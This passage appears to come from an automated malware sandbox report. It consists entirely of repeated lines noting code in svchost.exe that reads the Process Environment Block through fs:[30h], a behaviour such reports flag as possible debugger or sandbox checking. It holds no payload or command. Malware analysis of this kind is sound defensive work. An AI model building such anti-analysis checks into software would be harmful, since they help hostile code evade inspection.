                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
